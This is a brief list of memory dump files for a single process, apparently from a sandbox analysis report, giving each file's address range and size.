    • memory/3868-82-0x000000000A000000-0x000000000A094000-memory.dmp

      Filesize

      592KB

      Download

    • memory/3868-275-0x0000000009FA0000-0x0000000009FBA000-memory.dmp

      Filesize

      104KB

      Download

    • memory/3868-280-0x0000000009F90000-0x0000000009F98000-memory.dmp

      Filesize

      32KB

      Download

    • memory/3868-298-0x0000000073900000-0x0000000073FEE000-memory.dmp

      Filesize

      6.9MB

      Download